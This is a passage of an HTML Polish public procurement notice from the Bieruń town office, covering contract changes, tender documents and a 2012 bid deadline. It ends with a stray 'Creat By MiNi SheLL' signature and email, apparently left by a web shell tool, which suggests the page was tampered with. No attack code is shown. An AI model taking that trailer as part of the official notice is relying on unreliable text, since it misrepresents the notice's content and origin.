d. Mającym wpływ na realizację przedmiotu umowy, w przypadku gdy nastąpi zmiana        
    powszechnie obowiązujących przepisów prawa. 
e. Innych zmian, których nie można było przewidzieć na etapie sporządzania SIWZ, a które nie 
    wykraczają poza zakres art. 140 ustawy Prawo zamówień publicznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bierun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Bieruniu 43-150 Bieruń ul.Rynek 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.04.2012 godzina 10:00, miejsce: Urząd Miejski w Bieruniu 43-150 Bieruń ul.Rynek 14; Sekretariat  pokój nr 9 (I piętro, segment A).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com